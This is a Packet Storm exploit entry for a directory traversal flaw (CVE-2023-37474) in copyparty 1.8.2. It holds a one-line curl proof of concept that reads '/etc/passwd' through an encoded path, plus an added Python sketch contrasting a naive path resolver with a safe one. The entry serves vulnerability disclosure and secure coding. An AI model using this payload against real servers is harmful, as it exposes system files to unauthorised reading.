packetstorm | Vartamtzidis Theodoros | PACKETSTORM:173822
History: Jul 31, 2023 - 12:00 a.m.

Copyparty 1.8.2 Directory Traversal

2023-07-31 00:00:00
Vartamtzidis Theodoros
packetstormsecurity.com
copyparty server, directory traversal, exploit, cve-2023-37474, debian linux

EPSS: 0.055 (Low), percentile 93.3%

```
# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474

#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
```
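Added example, not code from copyparty or from the exploit author: a sketch of why a percent-encoded absolute path such as the one in the POC escapes a root directory when a handler joins it without a containment check, shown next to a resolver that rejects it. `WEB_ROOT`, `PREFIX` and both function names are assumptions made for illustration; copyparty's own handler is not shown on this page.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed layout: resources for the "/.cpr/" prefix are served from this root.
WEB_ROOT = "/opt/app/web"  # hypothetical path
PREFIX = "/.cpr/"


def resolve_naive(url_path: str) -> str:
    """Join the decoded remainder onto the root with no containment check."""
    rel = unquote(url_path[len(PREFIX):])
    # posixpath.join discards WEB_ROOT when rel is absolute, so a decoded
    # "%2Fetc%2Fpasswd" ("/etc/passwd") replaces the root entirely.
    return posixpath.normpath(posixpath.join(WEB_ROOT, rel))


def resolve_safe(url_path: str) -> Optional[str]:
    """Return a path inside WEB_ROOT, or None when the request escapes it."""
    if not url_path.startswith(PREFIX):
        return None
    rel = unquote(url_path[len(PREFIX):])
    # Reject NUL bytes, backslashes and absolute remainders outright.
    if "\x00" in rel or "\\" in rel or rel.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, rel))
    # After normalisation the result must still sit under the root;
    # this catches "../" sequences that survive decoding.
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    # A real handler would also resolve symlinks (os.path.realpath)
    # before this comparison.
    return candidate


if __name__ == "__main__":
    # Constructed inputs: the POC path from this page, a dot-dot form, and a benign one.
    for p in ("/.cpr/%2Fetc%2Fpasswd", "/.cpr/..%2F..%2Fetc%2Fpasswd",
              "/.cpr/deps/style.css"):
        print(f"{p!r:40} naive={resolve_naive(p)!r} safe={resolve_safe(p)!r}")
```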
